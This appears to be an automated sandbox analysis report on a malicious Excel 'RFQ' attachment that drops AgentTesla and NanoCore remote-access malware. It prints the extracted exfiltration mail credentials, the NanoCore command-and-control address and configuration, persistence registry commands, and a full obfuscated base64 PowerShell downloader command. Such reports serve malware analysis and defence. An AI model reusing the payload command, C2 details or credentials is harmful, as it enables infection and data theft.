Analysis
-
max time kernel
152s -
max time network
151s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
26-09-2021 20:04
Static task
static1
Behavioral task
behavioral1
Sample
RFQ#903_260921_new_request_10012_products.xls
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
RFQ#903_260921_new_request_10012_products.xls
Resource
win10-en-20210920
General
-
Target
RFQ#903_260921_new_request_10012_products.xls
-
Size
38KB
-
MD5
03cf64f6dff8c1467a756d8c2e2fac16
-
SHA1
c124554906286cdaa48240a394777b1ef6c853fe
-
SHA256
17b7d30b0960240b297dc208673fd4d8e9bfe52fc68a24785b83dc4b6702dba5
-
SHA512
4d47bc2367459ad55f2c5a91733d729c045035f0d8ad3fefa7f1ba015d68da957efbafd3dbb25a3033fcb4ac539480cc1c5d8d6e4d8baefe61f68caeca25bbb9
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
smtp.privateemail.com - Port:
587 - Username:
[email protected] - Password:
office12#
Extracted
nanocore
1.2.2.0
185.140.53.52:4488
4457cc23-84d1-4515-bdf3-bc83fe8472db
-
activate_away_mode
true
- backup_connection_host
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2021-07-08T12:51:02.136438436Z
-
bypass_user_account_control
false
-
bypass_user_account_control_data
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
4488
-
default_group
EXPO
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
4457cc23-84d1-4515-bdf3-bc83fe8472db
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
185.140.53.52
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
false
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 588 2276 cmd.exe EXCEL.EXE -
AgentTesla Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\ammero.exe family_agenttesla C:\Users\Admin\AppData\Roaming\ammero.exe family_agenttesla -
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes:
expo.exeammero.exeInstallUtil.exepid process 1820 expo.exe 1236 ammero.exe 2964 InstallUtil.exe -
Obfuscated with Agile.Net obfuscator 5 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
resource yara_rule behavioral2/memory/3768-433-0x0000000002620000-0x0000000002641000-memory.dmp agile_net behavioral2/memory/3768-438-0x00000000025A0000-0x0000000002632000-memory.dmp agile_net behavioral2/memory/1820-447-0x0000000005560000-0x0000000005A5E000-memory.dmp agile_net behavioral2/memory/1820-451-0x0000000005560000-0x0000000005A5E000-memory.dmp agile_net behavioral2/memory/1236-461-0x0000000005190000-0x000000000568E000-memory.dmp agile_net -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
reg.exeInstallUtil.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\expo = "C:\\Users\\Admin\\AppData\\Roaming\\expo.exe" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\SCSI Service = "C:\\Program Files (x86)\\SCSI Service\\scsisvc.exe" InstallUtil.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe -
Processes:
InstallUtil.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA InstallUtil.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
expo.exedescription pid process target process PID 1820 set thread context of 2964 1820 expo.exe InstallUtil.exe -
Drops file in Program Files directory 2 IoCs
Processes:
InstallUtil.exedescription ioc process File created C:\Program Files (x86)\SCSI Service\scsisvc.exe InstallUtil.exe File opened for modification C:\Program Files (x86)\SCSI Service\scsisvc.exe InstallUtil.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2888 schtasks.exe 3396 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2276 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 30 IoCs
Processes:
powershell.exeei.exeexpo.exeammero.exeInstallUtil.exepid process 712 powershell.exe 712 powershell.exe 712 powershell.exe 3768 ei.exe 3768 ei.exe 3768 ei.exe 3768 ei.exe 3768 ei.exe 3768 ei.exe 3768 ei.exe 3768 ei.exe 3768 ei.exe 3768 ei.exe 3768 ei.exe 3768 ei.exe 3768 ei.exe 3768 ei.exe 3768 ei.exe 3768 ei.exe 3768 ei.exe 1820 expo.exe 1820 expo.exe 1236 ammero.exe 1236 ammero.exe 2964 InstallUtil.exe 2964 InstallUtil.exe 2964 InstallUtil.exe 2964 InstallUtil.exe 2964 InstallUtil.exe 2964 InstallUtil.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
InstallUtil.exepid process 2964 InstallUtil.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exeei.exeexpo.exeammero.exeInstallUtil.exedescription pid process Token: SeDebugPrivilege 712 powershell.exe Token: SeDebugPrivilege 3768 ei.exe Token: SeDebugPrivilege 1820 expo.exe Token: SeDebugPrivilege 1236 ammero.exe Token: SeDebugPrivilege 2964 InstallUtil.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 2276 EXCEL.EXE 2276 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
EXCEL.EXEpid process 2276 EXCEL.EXE 2276 EXCEL.EXE 2276 EXCEL.EXE 2276 EXCEL.EXE 2276 EXCEL.EXE 2276 EXCEL.EXE 2276 EXCEL.EXE 2276 EXCEL.EXE -
Suspicious use of WriteProcessMemory 33 IoCs
Processes:
EXCEL.EXEcmd.exepowershell.exeei.execmd.exeexpo.exeInstallUtil.exedescription pid process target process PID 2276 wrote to memory of 588 2276 EXCEL.EXE cmd.exe PID 2276 wrote to memory of 588 2276 EXCEL.EXE cmd.exe PID 588 wrote to memory of 712 588 cmd.exe powershell.exe PID 588 wrote to memory of 712 588 cmd.exe powershell.exe PID 712 wrote to memory of 3768 712 powershell.exe ei.exe PID 712 wrote to memory of 3768 712 powershell.exe ei.exe PID 712 wrote to memory of 3768 712 powershell.exe ei.exe PID 3768 wrote to memory of 1136 3768 ei.exe cmd.exe PID 3768 wrote to memory of 1136 3768 ei.exe cmd.exe PID 3768 wrote to memory of 1136 3768 ei.exe cmd.exe PID 1136 wrote to memory of 3812 1136 cmd.exe reg.exe PID 1136 wrote to memory of 3812 1136 cmd.exe reg.exe PID 1136 wrote to memory of 3812 1136 cmd.exe reg.exe PID 3768 wrote to memory of 1820 3768 ei.exe expo.exe PID 3768 wrote to memory of 1820 3768 ei.exe expo.exe PID 3768 wrote to memory of 1820 3768 ei.exe expo.exe PID 1820 wrote to memory of 1236 1820 expo.exe ammero.exe PID 1820 wrote to memory of 1236 1820 expo.exe ammero.exe PID 1820 wrote to memory of 1236 1820 expo.exe ammero.exe PID 1820 wrote to memory of 2964 1820 expo.exe InstallUtil.exe PID 1820 wrote to memory of 2964 1820 expo.exe InstallUtil.exe PID 1820 wrote to memory of 2964 1820 expo.exe InstallUtil.exe PID 1820 wrote to memory of 2964 1820 expo.exe InstallUtil.exe PID 1820 wrote to memory of 2964 1820 expo.exe InstallUtil.exe PID 1820 wrote to memory of 2964 1820 expo.exe InstallUtil.exe PID 1820 wrote to memory of 2964 1820 expo.exe InstallUtil.exe PID 1820 wrote to memory of 2964 1820 expo.exe InstallUtil.exe PID 2964 wrote to memory of 2888 2964 InstallUtil.exe schtasks.exe PID 2964 wrote to memory of 2888 2964 InstallUtil.exe schtasks.exe PID 2964 wrote to memory of 2888 2964 InstallUtil.exe schtasks.exe PID 2964 wrote to memory of 3396 2964 InstallUtil.exe schtasks.exe PID 2964 wrote to memory of 3396 2964 InstallUtil.exe schtasks.exe PID 2964 wrote to memory of 3396 2964 InstallUtil.exe schtasks.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\RFQ#903_260921_new_request_10012_products.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c Po^W^ERS^he^LL -E WwBzAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBlAE4AQwBPAEQAaQBuAGcAXQA6ADoAdQBOAGkAQwBPAEQARQAuAGcAZQBUAFMAVAByAEkATgBHACgAWwBzAHkAUwBUAGUAbQAuAGMAbwBOAHYARQBSAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBFADYANABzAHQAUgBpAE4AZwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEcAcwBBAGIAQQBCAHkAQQBHADgAQQBjAGcAQgBwAEEARwBNAEEAWQBnAEIAcgBBAEgAWQBBAFoAZwBCAGgAQQBHAFkAQQBiAEEAQgBoAEEARwA0AEEAZABBAEIAdQBBAEcAbwBBAFoAdwBBAGcAQQBDAGcAQQBJAEEAQQBrAEEASABNAEEAYQB3AEIAMgBBAEcARQBBAGEAUQBCAG0AQQBHADAAQQBlAEEAQgA1AEEASABjAEEAWQB3AEIAMQBBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBhAEEAQgByAEEARwBVAEEAYgB3AEIAdwBBAEgAbwBBAGIAQQBCADAAQQBIAFUAQQBiAHcAQgBpAEEASABBAEEAYQBnAEEAZwBBAEMAawBBAEQAUQBBAEsAQQBIAHMAQQBJAEEAQgBKAEEARQAwAEEAVQBBAEIAUABBAEYASQBBAFYAQQBBAHQAQQBFADAAQQBiAHcAQgBrAEEASABVAEEAVABBAEIARgBBAEMAQQBBAFEAZwBCAEoAQQBIAFEAQQBVAHcAQgBVAEEARgBJAEEAUQBRAEIATwBBAEgATQBBAFoAZwBCAGwAQQBGAEkAQQBPAHcAQQBOAEEAQQBvAEEAVQB3AEIAMABBAEUARQBBAGMAZwBCAFUAQQBDADAAQQBRAGcAQgBKAEEARgBRAEEAYwB3AEIAMABBAEgASQBBAFEAUQBCAHUAQQBGAE0AQQBSAGcAQgBGAEEASABJAEEASQBBAEEAdABBAEgATQBBAGIAdwBCAFYAQQBIAEkAQQBZAHcAQgBsAEEAQwBBAEEASgBBAEIAegBBAEcAcwBBAGQAZwBCAGgAQQBHAGsAQQBaAGcAQgB0AEEASABnAEEAZQBRAEIAMwBBAEcATQBBAGQAUQBBAGcAQQBDADAAQQBSAEEAQgBsAEEARgBNAEEAVgBBAEIAcABBAEUANABBAFEAUQBCAFUAQQBFAGsAQQBiAHcAQgBPAEEAQwBBAEEASgBBAEIAbwBBAEcAcwBBAFoAUQBCAHYAQQBIAEEAQQBlAGcAQgBzAEEASABRAEEAZABRAEIAdgBBAEcASQBBAGMAQQBCAHEAQQBEAHMAQQBJAEEAQQBtAEEAQwBBAEEASgBBAEIAbwBBAEcAcwBBAFoAUQBCAHYAQQBIAEEAQQBlAGcAQgBzAEEASABRAEEAZABRAEIAdgBBAEcASQBBAGMAQQBCAHEAQQBEAHMAQQBJAEEAQgA5AEEASABRAEEAYwBnAEIANQBBAEgAcwBBAEoAQQBCADIAQQBIAEUAQQBlAEEAQgAwAEEARwBRAEEAYQBBAEIAbQBBAEcATQBBAFoAQQBCAG8AQQBHAFUAQQBZAGcAQgAxAEEARwBRAEEAWgB3AEEAOQBBAEMAUQBBAFoAUQBCAE8AQQBGAFkAQQBPAGcAQgAwAEEARQBVAEEAYgBRAEIAUQBBAEMAcwBBAEoAdwBCAGMAQQBHAFUAQQBhAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAE8AdwBBAE4AQQBBAG8AQQBhAHcAQgBzAEEASABJAEEAYgB3AEIAeQBBAEcAawBBAFkAdwBCAGkAQQBHAHMAQQBkAGcAQgBtAEEARwBFAEEAWgBnAEIAcwBBAEcARQBBAGIAZwBCADAAQQBHADQAQQBhAGcAQgBuAEEAQwBBAEEASgB3AEIAbwBBAEgAUQBBAGQAQQBCAHcAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAYgBnAEIAcgBBAEcARQBBAEwAUQBCADAAQQBHAFUAQQBhAHcAQQB1AEEARwBNAEEAYgB3AEIAdABBAEMANABBAGQAQQBCAHkAQQBDADgAQQBRAFEAQgBWAEEARQBjAEEATAB3AEIAMwBBAEcAVQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAawBBAEgAWQBBAGMAUQBCADQAQQBIAFEAQQBaAEEAQgBvAEEARwBZAEEAWQB3AEIAawBBAEcAZwBBAFoAUQBCAGkAQQBIAFUAQQBaAEEAQgBuAEEARABzAEEARABRAEEASwBBAEcAcwBBAGIAQQBCAHkAQQBHADgAQQBjAGcAQgBwAEEARwBNAEEAWQBnAEIAcgBBAEgAWQBBAFoAZwBCAGgAQQBHAFkAQQBiAEEAQgBoAEEARwA0AEEAZABBAEIAdQBBAEcAbwBBAFoAdwBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGgAQQBHADQAQQBhAHcAQgBoAEEAQwAwAEEAZABBAEIAbABBAEcAcwBBAEwAZwBCAGoAQQBHADgAQQBiAFEAQQB1AEEASABRAEEAYwBnAEEAdgBBAEUARQBBAFYAUQBCAEgAQQBDADgAQQBkAHcAQgBsAEEARwBRAEEATABnAEIAbABBAEgAZwBBAFoAUQBBAG4AQQBDAEEAQQBKAEEAQgAyAEEASABFAEEAZQBBAEIAMABBAEcAUQBBAGEAQQBCAG0AQQBHAE0AQQBaAEEAQgBvAEEARwBVAEEAWQBnAEIAMQBBAEcAUQBBAFoAdwBBADcAQQBBADAAQQBDAGcAQgByAEEARwB3AEEAYwBnAEIAdgBBAEgASQBBAGEAUQBCAGoAQQBHAEkAQQBhAHcAQgAyAEEARwBZAEEAWQBRAEIAbQBBAEcAdwBBAFkAUQBCAHUAQQBIAFEAQQBiAGcAQgBxAEEARwBjAEEASQBBAEEAbgBBAEcAZwBBAGQAQQBCADAAQQBIAEEAQQBPAGcAQQB2AEEAQwA4AEEAWQBRAEIAdQBBAEcAcwBBAFkAUQBBAHQAQQBIAFEAQQBaAFEAQgByAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEwAZwBCADAAQQBIAEkAQQBMAHcAQgBCAEEARgBVAEEAUgB3AEEAdgBBAEgAYwBBAFoAUQBCAGsAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEAZwBBAEMAUQBBAGQAZwBCAHgAQQBIAGcAQQBkAEEAQgBrAEEARwBnAEEAWgBnAEIAagBBAEcAUQBBAGEAQQBCAGwAQQBHAEkAQQBkAFEAQgBrAEEARwBjAEEATwB3AEEATgBBAEEAbwBBAGYAUQBCAGoAQQBHAEUAQQBkAEEAQgBqAEEARwBnAEEAZQB3AEIAOQBBAEEAPQA9ACIAKQApAHwASQBFAFgA2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:588 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWERSheLL -E WwBzAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBlAE4AQwBPAEQAaQBuAGcAXQA6ADoAdQBOAGkAQwBPAEQARQAuAGcAZQBUAFMAVAByAEkATgBHACgAWwBzAHkAUwBUAGUAbQAuAGMAbwBOAHYARQBSAHQAXQA6ADoARgBSAG8AbQBCAGEAUwBFADYANABzAHQAUgBpAE4AZwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBAEcAWQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEcAcwBBAGIAQQBCAHkAQQBHADgAQQBjAGcAQgBwAEEARwBNAEEAWQBnAEIAcgBBAEgAWQBBAFoAZwBCAGgAQQBHAFkAQQBiAEEAQgBoAEEARwA0AEEAZABBAEIAdQBBAEcAbwBBAFoAdwBBAGcAQQBDAGcAQQBJAEEAQQBrAEEASABNAEEAYQB3AEIAMgBBAEcARQBBAGEAUQBCAG0AQQBHADAAQQBlAEEAQgA1AEEASABjAEEAWQB3AEIAMQBBAEMAQQBBAEwAQQBBAGcAQQBDAFEAQQBhAEEAQgByAEEARwBVAEEAYgB3AEIAdwBBAEgAbwBBAGIAQQBCADAAQQBIAFUAQQBiAHcAQgBpAEEASABBAEEAYQBnAEEAZwBBAEMAawBBAEQAUQBBAEsAQQBIAHMAQQBJAEEAQgBKAEEARQAwAEEAVQBBAEIAUABBAEYASQBBAFYAQQBBAHQAQQBFADAAQQBiAHcAQgBrAEEASABVAEEAVABBAEIARgBBAEMAQQBBAFEAZwBCAEoAQQBIAFEAQQBVAHcAQgBVAEEARgBJAEEAUQBRAEIATwBBAEgATQBBAFoAZwBCAGwAQQBGAEkAQQBPAHcAQQBOAEEAQQBvAEEAVQB3AEIAMABBAEUARQBBAGMAZwBCAFUAQQBDADAAQQBRAGcAQgBKAEEARgBRAEEAYwB3AEIAMABBAEgASQBBAFEAUQBCAHUAQQBGAE0AQQBSAGcAQgBGAEEASABJAEEASQBBAEEAdABBAEgATQBBAGIAdwBCAFYAQQBIAEkAQQBZAHcAQgBsAEEAQwBBAEEASgBBAEIAegBBAEcAcwBBAGQAZwBCAGgAQQBHAGsAQQBaAGcAQgB0AEEASABnAEEAZQBRAEIAMwBBAEcATQBBAGQAUQBBAGcAQQBDADAAQQBSAEEAQgBsAEEARgBNAEEAVgBBAEIAcABBAEUANABBAFEAUQBCAFUAQQBFAGsAQQBiAHcAQgBPAEEAQwBBAEEASgBBAEIAbwBBAEcAcwBBAFoAUQBCAHYAQQBIAEEAQQBlAGcAQgBzAEEASABRAEEAZABRAEIAdgBBAEcASQBBAGMAQQBCAHEAQQBEAHMAQQBJAEEAQQBtAEEAQwBBAEEASgBBAEIAbwBBAEcAcwBBAFoAUQBCAHYAQQBIAEEAQQBlAGcAQgBzAEEASABRAEEAZABRAEIAdgBBAEcASQBBAGMAQQBCAHEAQQBEAHMAQQBJAEEAQgA5AEEASABRAEEAYwBnAEIANQBBAEgAcwBBAEoAQQBCADIAQQBIAEUAQQBlAEEAQgAwAEEARwBRAEEAYQBBAEIAbQBBAEcATQBBAFoAQQBCAG8AQQBHAFUAQQBZAGcAQgAxAEEARwBRAEEAWgB3AEEAOQBBAEMAUQBBAFoAUQBCAE8AQQBGAFkAQQBPAGcAQgAwAEEARQBVAEEAYgBRAEIAUQBBAEMAcwBBAEoAdwBCAGMAQQBHAFUAQQBhAFEAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAE8AdwBBAE4AQQBBAG8AQQBhAHcAQgBzAEEASABJAEEAYgB3AEIAeQBBAEcAawBBAFkAdwBCAGkAQQBHAHMAQQBkAGcAQgBtAEEARwBFAEEAWgBnAEIAcwBBAEcARQBBAGIAZwBCADAAQQBHADQAQQBhAGcAQgBuAEEAQwBBAEEASgB3AEIAbwBBAEgAUQBBAGQAQQBCAHcAQQBEAG8AQQBMAHcAQQB2AEEARwBFAEEAYgBnAEIAcgBBAEcARQBBAEwAUQBCADAAQQBHAFUAQQBhAHcAQQB1AEEARwBNAEEAYgB3AEIAdABBAEMANABBAGQAQQBCAHkAQQBDADgAQQBRAFEAQgBWAEEARQBjAEEATAB3AEIAMwBBAEcAVQBBAFoAQQBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAawBBAEgAWQBBAGMAUQBCADQAQQBIAFEAQQBaAEEAQgBvAEEARwBZAEEAWQB3AEIAawBBAEcAZwBBAFoAUQBCAGkAQQBIAFUAQQBaAEEAQgBuAEEARABzAEEARABRAEEASwBBAEcAcwBBAGIAQQBCAHkAQQBHADgAQQBjAGcAQgBwAEEARwBNAEEAWQBnAEIAcgBBAEgAWQBBAFoAZwBCAGgAQQBHAFkAQQBiAEEAQgBoAEEARwA0AEEAZABBAEIAdQBBAEcAbwBBAFoAdwBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGgAQQBHADQAQQBhAHcAQgBoAEEAQwAwAEEAZABBAEIAbABBAEcAcwBBAEwAZwBCAGoAQQBHADgAQQBiAFEAQQB1AEEASABRAEEAYwBnAEEAdgBBAEUARQBBAFYAUQBCAEgAQQBDADgAQQBkAHcAQgBsAEEARwBRAEEATABnAEIAbABBAEgAZwBBAFoAUQBBAG4AQQBDAEEAQQBKAEEAQgAyAEEASABFAEEAZQBBAEIAMABBAEcAUQBBAGEAQQBCAG0AQQBHAE0AQQBaAEEAQgBvAEEARwBVAEEAWQBnAEIAMQBBAEcAUQBBAFoAdwBBADcAQQBBADAAQQBDAGcAQgByAEEARwB3AEEAYwBnAEIAdgBBAEgASQBBAGEAUQBCAGoAQQBHAEkAQQBhAHcAQgAyAEEARwBZAEEAWQBRAEIAbQBBAEcAdwBBAFkAUQBCAHUAQQBIAFEAQQBiAGcAQgBxAEEARwBjAEEASQBBAEEAbgBBAEcAZwBBAGQAQQBCADAAQQBIAEEAQQBPAGcAQQB2AEEAQwA4AEEAWQBRAEIAdQBBAEcAcwBBAFkAUQBBAHQAQQBIAFEAQQBaAFEAQgByAEEAQwA0AEEAWQB3AEIAdgBBAEcAMABBAEwAZwBCADAAQQBIAEkAQQBMAHcAQgBCAEEARgBVAEEAUgB3AEEAdgBBAEgAYwBBAFoAUQBCAGsAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEAZwBBAEMAUQBBAGQAZwBCAHgAQQBIAGcAQQBkAEEAQgBrAEEARwBnAEEAWgBnAEIAagBBAEcAUQBBAGEAQQBCAGwAQQBHAEkAQQBkAFEAQgBrAEEARwBjAEEATwB3AEEATgBBAEEAbwBBAGYAUQBCAGoAQQBHAEUAQQBkAEEAQgBqAEEARwBnAEEAZQB3AEIAOQBBAEEAPQA9ACIAKQApAHwASQBFAFgA3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:712 -
C:\Users\Admin\AppData\Local\Temp\ei.exe"C:\Users\Admin\AppData\Local\Temp\ei.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3768 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "expo" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\expo.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "expo" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\expo.exe"6⤵
- Adds Run key to start application
PID:3812 -
C:\Users\Admin\AppData\Roaming\expo.exe"C:\Users\Admin\AppData\Roaming\expo.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
